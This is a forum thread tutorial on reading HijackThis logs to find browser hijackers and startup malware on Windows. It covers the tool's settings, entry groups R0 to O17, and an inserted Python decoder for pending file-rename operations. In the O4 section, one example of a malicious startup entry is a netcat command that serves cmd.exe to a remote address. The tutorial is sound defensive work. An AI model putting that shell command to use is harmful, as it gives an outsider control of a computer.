
Thread: How to read a HijackThis log?

  1. #1 (Join Date: May 2008, Posts: 420)

    How to read a HijackThis log?

    I started this manual some time ago, but for personal reasons and above all due to time constraints I could not finish it for a long time.
    Here it is; I hope it suits everyone.

    NOTE: This is my first manual, so all criticism is welcome.
    ____________________________________________________________________________________________________ ____________________

    How to read a HijackThis log?
    Index:

    1. What is HijackThis and what does it do?
    2. Installing HijackThis and other tools to use.
    3. Getting our log.
    4. Analyzing logs.
    5. Troubleshooting.
    ____________________________________________________________________________________________________ ____________________

    1. What is HijackThis?

    It is a small tool that allows us to detect and eventually remove the changes made by browser hijackers, such as toolbars, home page, search page, IE hijackers, etc.

    Note that not everything shown in the HijackThis log is bad; therefore you must be very careful about what you delete from the HijackThis log.
    ____________________________________________________________________________________________________ ____________________

    2. Installing and running HijackThis.

    The first thing we must do is download the latest version, HijackThis 2.0.2 (or another version; it works fine), which you can get here: Download.
    Once it is downloaded, close all running programs and run the new automated installer (earlier versions did not come with one).

    We choose the installation path and accept the license agreement. HijackThis will open automatically and add a shortcut icon to our desktop.
    After this sequence of steps, you will see an image like this:

    ____________________________________________________________________________________________________ ____________________

    3. Getting our HijackThis log.

    As we see in the picture above, there is only one step further we can take:
    click the button Do a system scan and save a logfile (which roughly means: scan your system and save a log file that can be posted in any forum or kept as a backup somewhere else).

    Now we wait for the system scan to run, and HijackThis will look like this:


    Then we analyze the output.

  2. #2 (Join Date: May 2008, Posts: 420)

    Re: How to read a HijackThis log?

    When you open HijackThis you are presented with the "QuickStart" screen.

    Note: If the above screen is not displayed, you either checked the last box so that it is no longer displayed, or you are using an older version of HijackThis.

    • Click 'None of the above, just start the program.' You will see the main screen of HijackThis.

    • If you click 'Scan', you see the entries found by HijackThis. The "Scan" is basically a process in which HijackThis searches the system for information, such as ActiveX, BHOs and more. If you select the option "Do a system scan only" in the main menu it automatically performs this scan; there is no need to click "Scan."

    • When you select an entry, you can click on "Info on selected item" so that HijackThis gives you more information about the selected entry. You can also check certain entries and then click "Add checked to Ignorelist" so that HijackThis ignores these entries in the future and no longer shows them in the log.

    • Note that the "Scan" button became "Save Log". By clicking "Save Log", HijackThis will save a log file with the information shown plus information on the processes that are running. HijackThis will ask you for the name and location to save the file. It is the same as selecting "Do a system scan and save a logfile" on the main menu, but if you select the button in the main menu HijackThis automatically saves the log in a file called "hijackthis.log", whereas here it gives you the option to choose where to save the log file.

    • When you check certain entries and click "Fix Checked", HijackThis will take different measures depending on the entry. If you click "Info on selected item", HijackThis tells you what it will do - we will see each type of entry in detail later.

    • The "Info" button gives general information about HijackThis, including a brief explanation of each entry type and a changelog (which details the changes the program received in each version).

  3. #3 (Join Date: May 2008, Posts: 420)

    Re: How to read a HijackThis log?

    The "Config" button

    By clicking "Config", the HijackThis settings screen appears, with four tabs at the top: Main, Ignorelist, Backups, Misc Tools.

    Main

    In the Main tab you can find various HijackThis settings.

    • Mark everything found for fixing after scan - If checked, all items found by HijackThis are marked. Use this option if a log is so infected that it is much easier to uncheck a few entries than to mark all the infected ones.

    • Make backups before fixing items - makes backups before fixing any entry. Very useful; it is recommended to leave it checked.

    • Confirm fixing & ignoring of items (safe mode) - if unchecked, this option removes the confirmation screen when you fix or ignore any entry.

    • Ignore non-standard but safe domains in IE - a 'white list' that filters R1/R0 entries. If unchecked, all R1/R0 items will appear, even those containing popular domains marked as safe. When checked, this option helps the log to be smaller and cleaner.

    • Include list of running processes in logfiles - if unchecked, HijackThis does not include the list of running processes in the log. The list of processes can be seen in the Task Manager on Windows NT/2000/XP, or through additional tools on Windows 9x/ME. It is recommended to leave this option checked, as information is never enough.

    • Show Intro frame at startup - if unchecked, this option removes the startup screen; unchecking it has the same effect as checking "Do not show this frame again when I start HijackThis" on the Welcome screen. Whether to check it or not depends only on your preference.

    • Run HijackThis scan at startup and ... - this option makes HijackThis run automatically when Windows boots. That way it can scan the system as soon as it starts, catching entries that hide themselves automatically after a short period of time and could not be included in a log made after the system is completely initialized. This option is generally not very useful, but it is worth mentioning anyway.


    The following options are the defaults that HijackThis uses when you fix certain items related to Internet Explorer:

    • Default Start Page - the default homepage in Internet Explorer; HijackThis will reset homepage entries to this after fixing. User's preference.

    • Default Search Page - the default search page used by Internet Explorer. Because this entry is typically modified by hijackers, HijackThis needs a value to reset it to. You can set the value used by this option.

    • Default Search Assistant - 'Search Assistant' from Internet Explorer.

    • Default Customize Search - 'Personalization of Search' in Internet Explorer.



    Ignorelist tab

    In the 'Ignorelist' tab you can find the items ignored through the "Add checked to Ignorelist" button. It is recommended that you clear this list using "Delete all" after installing a new version of HijackThis.
    The entries removed are not deleted, but are removed from HijackThis's list of items to ignore, so that they re-appear in the log normally.


    Backups tab

    If "Make backups before fixing items" is checked in the "Main" tab (and it is checked by default), HijackThis creates backups of all fixed items. On this screen you can delete individual backups using "Delete", delete all items with "Delete all", or, if you want an entry back in place, use "Restore". Use this screen whenever any program or feature of the system stops working after HijackThis has been used.

  4. #4 (Join Date: Feb 2008, Posts: 2,635)

    Re: How to read a HijackThis log?

    What should I do before I make a HijackThis log?

    First, go through the following steps before you post your log.


    1. Make sure you have all "essential" updates from Microsoft.

    2. Download and install Hitman Pro 2.2.3
    Hitman Pro is an all-in-one program and very useful for searching for spyware etc.
    Hitman Pro

    3. Install and run CoolWWWSearch Smart Killer
    Note: this scan takes a few seconds. If the hijacker is not found on your PC, the mini-scanner says "Smart CoolWWWSearch Killer has not been found on your system"
    Smart Killer

    4. Empty your temporary Internet files.
    Internet Explorer ---> Tools ---> "General" tab
    * Cookies
    * Temporary Internet files (including offline)
    * History

    5. Do at least one online virus scan

    6. Restart your computer

  5. #5 (Join Date: May 2008, Posts: 420)

    Re: How to read a HijackThis log?

    Misc Tools

    One of the best things about HijackThis is that it has a fairly complete kit for system maintenance. In addition to clearing problem areas of the registry, it has several additional tools that remove the need to install or download other tools.

    • Generate Startuplist Log
    • Open Process Manager
    • Open hosts file manager
    • Delete the file on reboot
    • Delete an NT service
    • Open ADS Spy
    • Open Uninstall Manager
    • Advanced Settings
    • Check for Update online
    • HijackThis Uninstall & Exit


    Generate Startuplist Log

    The first button we see on this screen is 'Generate startuplist log'. This button generates a log with the StartupList program. StartupList shows all the places from which programs can be started in Windows, including several areas that are not displayed by HijackThis. However, StartupList does not give us the option to fix anything it finds. The two checkboxes next to the button make the StartupList log more complete - it is always recommended to check them before making a StartupList log.

    Note: StartupList is a very advanced tool. As it is a separate program, the interpretation of StartupList logs will not be included in this document.


    Open Process Manager

    Next we see "Open Process Manager". Clicking it opens the "Itty Bitty Process Manager". This program is very useful especially on Windows 9x and ME, as the Task Manager there is very simple and does not include programs registered as processes.
    Although it shows less information than the default Windows Task Manager, it allows more than one process to be selected (using the CTRL and SHIFT keys) and includes the "Show DLLs" option, which opens a new panel listing all DLLs loaded in the process. These DLLs are shown as modules, and some trojans are injected as modules into system processes so they run without a visible process in the normal list. This is very rare, so most of the DLLs listed are safe.
    "Kill Process" ends the selected process(es). "Refresh" updates the list of processes, and the "Run" button starts a program or process the same way as "New Task" in Task Manager.
    It also has two icons next to the "Show DLLs" option. The first (left to right) is "Copy list to clipboard", to copy the list of files so you can paste it anywhere. The disk icon saves the list to a text file.


    Open hosts file manager

    This is a small program to edit the HOSTS file. After you select it, use "Open in Notepad" to open the file in Notepad, where it is much easier to manage the HOSTS file. For reference, the "Delete line(s)" button deletes the selected line(s), and "Toggle line(s)" adds or removes a '#' at the beginning of the line. Read the document on the HOSTS file to understand more about it.


    Delete the file on reboot ...

    Probably one of the simplest and most useful.
    Windows has a feature called PendingFileRenameOperations that can perform file operations (such as delete, rename and move) before the system is completely started. This can be used to delete files that Windows always says are "in use". It is useful for removing trojan horses before they are initialized, without giving them a chance to try to protect themselves.

    After selecting the button, all you need to do is select the file to be deleted (or copy & paste the full path of the file) and click 'Open'. After that, HijackThis will ask if you want to restart Windows. In most cases you will want to answer 'No' and restart manually later.
    Pocket KillBox has more options based on this Windows feature, including options for replacing files, which are more likely to work than operations that only delete the files.


    Delete an NT service

    Several recent trojans install themselves as Windows NT services. Even if an antivirus or anti-spyware removes the file started by the service, the service will still be listed in Administrative Tools with the others.
    With this tool HijackThis can delete a service for you. You can use either the full display name of the service or its real service name. Note that 'services' are only available on Windows NT/2000/XP.
    For a list of services on your system, click Start -> Run, type services.msc and click OK. Right-click the service you want to delete and click "Properties." You can use both the "Display name" and the "Service name" in HijackThis to remove it from the list.
    Note: Take extreme care when using this tool! Services cannot be recovered after they have been removed!


    Open ADS Spy ...

    This is a tool embedded in HijackThis for managing Alternate Data Streams (ADS). It is also available separately on Merijn's site.

    If the Quick Scan option is checked, only the Windows folder will be examined. The "Ignore safe system info streams" option ignores ADS entries that are generally safe, such as the information placed in the "Summary" tab of file properties. The option to calculate MD5 should be used only if you want to develop tools for removing a certain type of malware.
    Not all ADS found are malicious. Even if "Ignore safe system info streams" is checked, ADS Spy can still find safe streams and streams used by antivirus software. Always do a search before you delete any stream. See our paper on streams to learn more.


    Open Uninstall Manager

    Many programs, after being uninstalled, leave entries in the Add/Remove Programs list. As if that were not enough, several trojans (mostly hijackers) have begun to include entries in Add/Remove Programs, supposedly to uninstall themselves from the system.
    The reality is that these entries often do not work, and after you remove the problem manually they remain in the list. With this option you can remove them from there.

    To delete an entry you must select it, click "Delete this entry" and then confirm the action by clicking Yes. The 'Edit command' option edits the path to the program Windows runs to uninstall the selected software - it is recommended that you not change the commands without being absolutely certain of what you are doing.


    Advanced Settings

    After the list of tools, HijackThis lists two advanced options:

    • Calculate MD5 of files if possible
    • Include environment variables in logfile

    The first option includes the MD5 of the files in the report/log. This is only useful if you know the MD5 hash of the file you want to remove or are developing a tool to remove the files.
    The second option includes environment variables, such as the location of the Windows folder and the location of the Hosts file - not very useful.


    Check for Update online

    HijackThis can check for a new version of HijackThis on SpywareInfo's servers by clicking this button. If you use a proxy to connect, you can define it in the text box below the button.


    HijackThis Uninstall & Exit

    To save all its settings, HijackThis creates various keys in the registry. With this button, HijackThis deletes these keys. Note that the HijackThis file itself is not removed and the backups are not removed. The Ignore List, on the other hand, is removed.
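As an added example for the "Delete the file on reboot" tool described above (my own code, not from the thread or from HijackThis), here is a decoder for the PendingFileRenameOperations value that the tool queues its work into. It assumes the MoveFileEx layout of that REG_MULTI_SZ value: strings come in (source, target) pairs, an empty target means delete, a "!" prefix on the target means replace an existing file, and paths carry the NT "\??\" prefix; the sample value is constructed.

```python
# Added example: decode HKLM\SYSTEM\CurrentControlSet\Control\Session Manager
# \PendingFileRenameOperations so a defender can see what is queued to be
# deleted or renamed at the next boot.  Layout assumed (MoveFileEx with
# MOVEFILE_DELAY_UNTIL_REBOOT): pairs of (source, target), "" target = delete,
# "!" prefix on target = replace existing, "\??\" NT path prefix.

NT_PREFIX = "\\??\\"


def encode_multi_sz(strings):
    """Raw REG_MULTI_SZ bytes: every string NUL-terminated, then one more NUL,
    all UTF-16LE.  Only used here to build the constructed sample value."""
    return ("\0".join(strings) + "\0\0").encode("utf-16-le")


def decode_multi_sz(data):
    """Split raw REG_MULTI_SZ bytes into strings.  Empty strings are kept,
    because Windows writes one as the target of each pending delete."""
    text = data.decode("utf-16-le")
    if not text.endswith("\0\0"):
        raise ValueError("not a terminated REG_MULTI_SZ value")
    if text == "\0\0":
        return []
    parts = text[:-1].split("\0")   # drop the list terminator
    return parts[:-1]               # drop the empty piece after the last string's NUL


def strip_nt_prefix(path):
    return path[len(NT_PREFIX):] if path.startswith(NT_PREFIX) else path


def pending_file_operations(data):
    """Return the queued operations as dicts with op 'delete', 'rename'
    or 'malformed' (an unpaired trailing string)."""
    strings = decode_multi_sz(data)
    ops = []
    for i in range(0, len(strings) - 1, 2):
        source, target = strings[i], strings[i + 1]
        replace = target.startswith("!")
        if replace:
            target = target[1:]
        if target == "":
            ops.append({"op": "delete", "source": strip_nt_prefix(source),
                        "target": None, "replace": False})
        else:
            ops.append({"op": "rename", "source": strip_nt_prefix(source),
                        "target": strip_nt_prefix(target), "replace": replace})
    if len(strings) % 2:
        ops.append({"op": "malformed", "source": strings[-1],
                    "target": None, "replace": False})
    return ops


# Constructed sample value: one queued delete and one queued replace.
SAMPLE_VALUE = encode_multi_sz([
    NT_PREFIX + r"C:\WINDOWS\TEMP\se.dll", "",
    NT_PREFIX + r"C:\WINDOWS\system32\new.dll",
    "!" + NT_PREFIX + r"C:\WINDOWS\system32\old.dll",
])

if __name__ == "__main__":
    # On Windows you would read the live value with winreg.QueryValueEx on the
    # key named at the top instead of using SAMPLE_VALUE.
    for op in pending_file_operations(SAMPLE_VALUE):
        print(op)
```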

  6. #6 (Join Date: May 2008, Posts: 420)

    Re: How to read a HijackThis log?

    4. Analyzing the log of HijackThis.

    I shall list the components that make up the HijackThis log and then explain each briefly.
    These are:

    R0, R1, R2, R3: Start page / search page URLs in Internet Explorer.

    F0, F1, F2, F3: Programs loaded from *.ini files (system.ini, win.ini).

    N1, N2, N3, N4: Homepage / search page URLs for Firefox or Netscape.

    O1: Redirects by means of the HOSTS file.

    O2: BHOs (Browser Helper Objects), plugins that extend the browser's functionality but can also be spyware.

    O3: IE Toolbars (Internet Explorer).

    O4: Applications that load automatically at Windows startup, either from the registry or from the Startup folder.

    O5: IE options hidden from the Windows Control Panel.

    O6: Administrator restrictions on the IE options.

    O7: Administrator restrictions on the Registry.

    O8: Extra items in the IE context menu.

    O9: Additional buttons on the IE toolbar, e.g. FlashGet, DAP, Encarta, and so on.

    O10: Winsock Hijackers.

    O11: An extra group added to the advanced options of IE.

    O12: Plugins for IE.

    O13: IE prefix hijack.

    O14: Hijack of IE defaults.

    O15: Sites not allowed in the Trusted zone set by IE.

    O16: ActiveX Objects.

    O17: Domain hijack / Lop.com

    O18: Extra protocols / protocol hijacks.

    O19: User stylesheet hijack.

    O20: AppInit_DLLs registry values that load automatically.

    O21: ShellServiceObjectDelayLoad registry keys that load automatically.

    O22: SharedTaskScheduler registry keys that load automatically.

    O23: Services.

    Each component has been listed. Now we will see how we can correct any problems after reading these indicators.

  7. #7 (Join Date: May 2008, Posts: 420)

    Re: How to read a HijackThis log?

    5. Troubleshooting the system with HijackThis.

    Group R0, R1, R2, R3.

    In this case, if the URLs listed here were configured by us, there is no problem and we leave them as they are.
    But if they were not set by us, the instructions are not very extensive: we check the entry and click Fix Checked.

    Good Example:
    Code:
    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page=www.google.com
    Bad Example:
    Code:
    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar=res://C:\WINDOWS\TEMP\se.dll/sp.html
    NOTE: R2 is no longer used.

    Continuing R3:
    R3 is the reference used by the URL Search Hook. If you manually enter a URL as a homepage without a protocol (http://, ftp://), IE tries to find the machine and, if it does not succeed, goes to the URL Search Hook.

    Good Example:
    R3 - Default URLSearchHook is missing

    Bad Example, to be checked and 'Fix Checked':
    Code:
    R3 - URLSearchHook:(no name)-_(CFBFAE00-17A6-11D0-99CB-00C04FD64497)-(no file)
    ____________________________________________________________________________________________________ ____________________

    Group F0, F1, F2, F3.
    Here programs are loaded from *.ini files (win.ini, system.ini).

    F0: According to the sources I consulted, it is recommended that if there is a line starting with F0, you check it and then click Fix Checked.

    F1: Programs used by old Win 3.1/95/98, attached in the win.ini file in the Run= and Load= keys. In this case we must search for information before checking it and clicking Fix Checked.

    F2 and F3: They are the same as above, but on the NT kernel (I'm talking about Windows NT/2000/XP), which does not use the startup files system.ini and win.ini named above in the same way.

    Some examples of reference:
    Code:
    HKLM\Software\Microsoft\Windows NT\CurrentVersion\IniFileMapping 
    HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
    Code:
    HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit=[**]\system32\userinit.exe,[**]\moralla.exe

    Under Win NT the default is userinit; nddeagnt.exe is also normal on that system. But any other executable is highly likely to be spyware and/or a trojan.
    ____________________________________________________________________________________________________ ____________________

    Group N1, N2, N3, N4.

    Homepage / search page URLs in Netscape / Mozilla.

    N1: Refers to the home page and search engine of Netscape 4.
    N2: Refers to the home page and search engine of Netscape 6.
    N3: Refers to the home page and search engine of Netscape 7.
    N4: Corresponds to the home page and search engine of Mozilla Firefox.

    They are commonly found in the file prefs.js.

    NOTE:
    Currently, the highest percentage of spyware, malware and hijackers are made for IE and not for Mozilla, Netscape or Opera, so those remain a bit safer than IE.
    ____________________________________________________________________________________________________ ____________________

    O1 group:
    Corresponds to redirects in the Hosts file.

    What is the Hosts file?
    The Hosts file works as a kind of converter, responsible for establishing the relationship between IP address and hostname.

    127.0.0.1 www.google.com

    If you try to go to www.google.com, the hosts file is checked, the entry is found, and the IP address 127.0.0.1 is used.
    In this box you'll see the default Hosts file installation paths:


    If you see entries like the one shown above and there is no specific reason you know of for them to be there, you can safely delete them.

    If you see that the hosts file is located in C:\Windows\Help\hosts, that means you're infected with CoolWebSearch. If you notice that the hosts file is not in the default path for your operating system, then check the entry in the HijackThis scan and click Fix Checked, or use another program to clean up the Hosts file.

    If you're not a very advanced user and do not want to complicate things with HijackThis, you can use the Host program, which allows you to restore the hosts file to its default configuration for your system.

    To do this, download the Host program from here: Download Host. Run it; once open, click the "Restore Original Host" button and, once this is done, close the program.
    ____________________________________________________________________________________________________ ____________________

    O2 Group:
    This group belongs to the Browser Helper Objects (BHO).

    Real example of BHO:
    Code:
    BHO: NAV Helper- -C:\Program Files\Norton AntiVirus\NavShExt.dll
    To fix these types of entries, we can consult a list like this one, hosted by Sysinfo. It can be found here: http://sysinfo.org/bholist.php

    When we consult the list, we must pay attention to the CLSID, which is between the curly braces in the list. The CLSIDs in the list refer to log entries that contain information about the BHO.

    Once malicious entries are detected, check them and click "Fix Checked". But then HijackThis will want to close them instantly and may not be able to do so, because they will be in use.

    In this case what we should do is boot into safe mode by pressing F8 before the system starts and delete them manually.
    ____________________________________________________________________________________________________ ____________________

    Group O3:
    This group corresponds to the toolbars of Internet Explorer.
    These are the famous "Toolbars", located below the navigation bar or in the context menu of IE.

    They are in the following registry key:
    Code:
    HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar
    Example:
    Code:
    Toolbar: Norton AntiVirus - - C:\Program Files\Norton AntiVirus\NavShExt.dll
    If these entries were not added by you, or you do not recognize their names, you can consult the Sysinfo list from the previous group to find the entry and see whether it belongs on your system or not. If you do not want something on your system, you can delete it easily, as we did before: check the entry and click Fix Checked.

    In this group it is the same as in the previous group: HijackThis will attempt to delete the selected entries, but some cannot be deleted and you have to boot into safe mode to delete them manually.
    ____________________________________________________________________________________________________ ____________________

    O4 Group:
    This group corresponds to the programs or applications that start when Windows starts on our system.
    They are commonly found in registry keys and in the Startup folders. This is only valid for NT, XP and 2000.

    - The registry keys which can hold these applications are these:

    Code:
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices 
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices 
    HKLM\Software\Microsoft\Windows\CurrentVersion\Run 
    HKCU\Software\Microsoft\Windows\CurrentVersion\Run 
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx 
    HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 
    HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 
    HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
    NOTE: HKLM = HKEY_LOCAL_MACHINE; HKCU = HKEY_CURRENT_USER.

    There are two folders from which applications can be started:

    Startup: C:\Documents and Settings\USERNAME\Start Menu\Programs\Startup -> for a particular user.
    Global: C:\Documents and Settings\All Users\Start Menu\Programs\Startup -> applies to all users.

    When fixing O4 entries, HijackThis does not delete the files associated with the entry. You must delete them manually, usually by rebooting the machine into safe mode. Startup and Global Startup entries work a little differently: HijackThis deletes the shortcuts in these folders, but not the files they point to. If the executable itself resides in the Startup or Global Startup directory, it will be deleted.

    Example of legitimate application:
    Code:
    HKLM\ ... \Run:[Winamp]"C:\Winamp\winamp.exe"/(can be any argument)
    Possible malicious application example:
    Code:
    HKLM\...\Run:[**]210.xxx nc-vv-e cmd.exe "
    You can check your log against some of these lists of legitimate startups to see whether the applications that start with your system are genuine or, in the worst case, trojans, spyware or hijackers.
    These lists can help you:
    http://www.answersthatwork.com/Taskl...s/tasklist.htm
    http://greatis.com/regrun3appdatabase.htm
    http://www.sysinfo.org/startuplist.php
    ____________________________________________________________________________________________________ ____________________

    O5 Group:
    This group corresponds to not being able to access the IE settings from the Control Panel.
    By adding an entry in the Control.ini file, which by default should be found at "C:\Windows\Control.ini", we can specify which control panel applets should not be visible.

    Example: File: Control.ini: inet.cpl=no. This hides the IE options in the Control Panel.

    If in your log you find a line like this and it was not put there by you, by another person you trust, or by the system administrator, it is a sign that a malicious application is trying to block or impede modification of the IE options. It may also be a restriction placed by some anti-spyware software such as SpyBot or Ad-Aware; in the latter case you can leave it with peace of mind, otherwise you can use HijackThis to fix it.
    ____________________________________________________________________________________________________ ____________________

    O6 Group:
    This section corresponds to a restriction by the administrator on making changes to the settings or the homepage of Internet Explorer, through certain settings in the registry.

    Example: --
    Code:
    HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions
    These options are only blocked if the administrator has done so, or, in casual personal use, if the function that blocks the IE options from the "Immunize" panel of the antispyware software SpyBot Search & Destroy is activated.
    ____________________________________________________________________________________________________ ____________________

    Group O7:
    This section corresponds to Regedit not being able to run because of a change to an entry in the registry.

    Registry Key:
    Code:
    HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
    Sample O7 entry --
    Code:
    HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System:
    DisableRegedit=1
    NOTE: In some cases, administrators of certain places, such as cyber cafes, businesses or other sites, block access to regedit so that settings cannot be changed. But if you see this on your system and it was not done by you, you can use HijackThis to delete it with ease.
    ____________________________________________________________________________________________________ ____________________

    Group O8:
    This group is for extra objects found in the context menu of Internet Explorer.

    That is, the options you normally see when you right-click on any web page you're viewing in your browser.
    Code:
    Registry key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt

    Sample O8 entry --
    Code:
    Extra context menu item: &Google Search -- res://c:\windows\GoogleToolbar1.dll/cmsearch.html
    The listing for these entries shows the objects that appear in the context menu when you right-click, and what program is used when you click on that option. Some, like "Browser Pal", should always be removed, and the rest should be searched on Google before doing anything. An example of a legitimate program that we could find there would be Google Toolbar.

    When you fix these entries, HijackThis does not delete the files mentioned in the list. It is recommended that you restart in safe mode, as in the previous cases, and delete these files and/or the folders of the toolbar above.
    ____________________________________________________________________________________________________ ____________________

    Group O9:
    This group corresponds to the buttons we have in the main toolbar of IE, or the items on the Tools menu of IE, that are not part of the default installation.

    Code:
    Registry Key:HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions
    Sample O9 entry --
    Code:
    Extra Button: AIM (HKLM)
    If you do not need these buttons or menu items, or recognize them as malware, you can safely fix them.

    The same happens as in the previous groups: HijackThis cannot delete the files mentioned here, so you have to reboot into safe mode to manually delete the malicious folders and/or files.
    ____________________________________________________________________________________________________ ____________________

    Group 10:
    This group corresponds to the Winsock Hijackers, also known as LSP (Layered Service Provider). The LSPs are a way to connect your software to implement a Winsock 2 on your computer. Since the LSPs are chained when the Winsock is used, the data are transported via each LSP in the chain. The spyware and hijackers may use LSPs to see all the traffic that is generated on your Internet connection.

    Be careful when removing these objects: if they are removed improperly, you could lose Internet access.

    Sample listing O10:
    Code:
    Broken Internet access because of LSP provider 'spsublsp.dll' missing
    Many virus scanners begin scanning for viruses, trojans, etc. at the Winsock level. The problem is that many of them do not reorder the LSPs correctly after deleting the problematic LSP. This can cause HijackThis to display a warning like the example above even though the Internet is still working. You should consult an expert before fixing these errors. You can also use LSPFix.

    Spybot can usually fix this too, but make sure you have the latest version, as older versions had problems here.

    If you're not a very advanced user, instead of HijackThis you can use a tool called LSPFix (Download) to fix these errors.
    ____________________________________________________________________________________________________ ____________________

    Group 11:
    This group lists non-default options that have been added to the Advanced tab of Internet Options in Internet Explorer.

    If you go to Tools >> Internet Options you will see the Advanced tab. A new set of options can be added there by adding an entry under a registry key.

    Code:
    Registry Key:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions
    Sample listing O11:
    Code:
    Options group: [CommonName] CommonName
    Quoting the manual I read: "According to Merijn, the creator of HijackThis (and also CWShredder, StartupList, etc.), only one hijacker is known to use this, and it is CommonName. If you see CommonName in the list, you can safely remove it. If you see another entry, you should use Google to research a little."
    ____________________________________________________________________________________________________ ____________________

    Group 12:
    This group corresponds to plug-ins or add-ons for Internet Explorer. Plug-ins are pieces of software loaded when Internet Explorer starts to add functionality to the browser. There are many legitimate plug-ins, such as the one for displaying PDF files, and also illegitimate ones.

    Code:
    Registry key:HKEY_LOCAL_MACHINE\software\microsoft\internet explorer\plugins
    Sample listing O12:
    Code:
    O12 - Plugin for .PDF: C:\Program Files\Internet Explorer\PLUGINS\nppdf32.dll
    Many plug-ins are legitimate, so you should investigate on Google before deleting anything.

    One of the most popular illegitimate plug-ins is Onflow, which has a .OFB extension.

    When you fix these entries with HijackThis, HijackThis will try to delete the listed file. Sometimes the file may be in use even if Internet Explorer is closed. If the file is still not removed, you must boot into safe mode and remove it manually.
    ____________________________________________________________________________________________________ ____________________

    Group 13:
    This group corresponds to a hijack of Internet Explorer's default prefix. The default prefix is a Windows setting that specifies how URLs typed without a prefix such as http://, ftp://, etc. are handled. By default Windows adds http:// at the beginning as the default prefix. You can change this default prefix to one of your choice by editing the registry. The hijacker known as CoolWebSearch does this by changing the default prefix to http://ehttp.cc/?. That means that when you type a URL such as www.google.com, you actually go to http://ehttp.cc/?www.google.com, which is in fact the CoolWebSearch website.

    Registry key:
    Code:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix\
    Sample listing O13:
    Code:
    O13 - WWW. Prefix: http://ehttp.cc/?
    If you are experiencing problems like the one above, you should run CWShredder. This program removes all known variants of CoolWebSearch that may be on your machine.

    If CWShredder does not find or fix the problem, you can use HijackThis to fix this entry if it is found.
    ____________________________________________________________________________________________________ ____________________

    Group O14.
    This group is for the "Reset Web Settings" hijacker. There is a file on your computer that IE (Internet Explorer) uses when you reset its options to the defaults. By default this file is saved at C:\Windows\inf\iereset.inf and contains all the default settings to be used. When you reset the configuration, this file is read and the settings it contains are applied. If a hijacker changes the information in that file, then when you reset the configuration you will be hijacked again, because the settings are read from the altered iereset.inf file.

    Sample listing O14:
    Code:
    O14 - IERESET.INF: START_PAGE_URL=http://www.searchalot.com
    In conclusion, seeing such an entry in your log does not always mean it is bad. It may have been set by you or by a computer administrator, so you should stop and check whether you know the address in the file. Conversely, if it is unknown to you, you can check it and click Fix Checked.
    ____________________________________________________________________________________________________ ____________________

    Group O15.
    This group corresponds to unwanted sites in IE's Trusted Sites zone. Internet Explorer security is based on a number of zones. Each zone has a different security level in terms of the scripts and applications that can run while you are browsing in that zone. You can add domains to particular zones, so if you are browsing a domain that belongs to a low-security zone, it will be allowed to run scripts, some of them potentially dangerous, on a website.

    Registry key:
    Code:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
    Sample listing O15:
    Code:
    O15 - Trusted Zone: http://www.arwinianos.net
    So, for any entry whose source or URL we do not recognize, we check it and click Fix Checked.
    ____________________________________________________________________________________________________ ____________________

    Group O16.
    This group is for ActiveX objects, also known as "Downloaded Program Files".

    ActiveX objects are programs downloaded from websites and stored on your computer. These objects are stored by default in C:\Windows\Downloaded Program Files. They are referenced in the registry by their CLSID, which is a long string of numbers in braces {}. There are many legitimate ActiveX controls, such as this example, which is an iPIX viewer.

    Sample listing O16:
    Code:
    O16 - DPF: (iPIX ActiveX Control) - http://www.ipix.com/download/ipixx.cab
    Another legitimate example is an ActiveX control for playing a game online.
    Many are legitimate, but some are used with other intentions.

    If you see names or addresses you do not recognize, you should search Google to see whether they are legitimate. If you confirm that they are illegitimate, you can fix them. Removing an ActiveX object from your computer is not a big problem, since it will be downloaded again when you return to the site it came from.
    As we said above, not all ActiveX controls are illegitimate. Many are used by legitimate websites to give access to functions that are not available without the ActiveX object.

    For example:
    Any online AV, such as Eset or Kaspersky, needs to run an ActiveX control to read the contents of your files so that it can analyze them.

    When you fix these entries with HijackThis, HijackThis will try to delete the listed file. Sometimes the file may be in use even if Internet Explorer is closed. If the file is still not removed, you must boot into safe mode and remove it manually.
    ____________________________________________________________________________________________________ ____________________

    Group O17.
    This group is for Lop.com domain hijacks.

    When we visit a website using a domain name such as www.hotmail.com instead of an IP address, your computer uses a DNS server to translate the domain name into an IP address such as 200.56.15.85. The domain hijack happens when the hijacker changes the DNS servers on your machine to point to servers they control, so they can send you anywhere they want. By adding www.hotmail.com to their DNS servers, they can make it so that when you go to www.hotmail.com you are redirected to a site of their choice, for example a site that downloads more malware to your computer or infects you with a trojan.

    Sample listing O17:
    Code:
    O17 - HKLM\System\CS1\Services\VxD\MSTCP:NameServer=69.57.146.14,69.57.147.175
    If you see entries of this type and do not recognize the domain as belonging to your ISP or the company that provides your Internet access, and the DNS servers do not belong to your ISP or that company, then you should use HijackThis to fix this.

    Otherwise, you can do a Whois lookup on the IP address to see which company it belongs to.
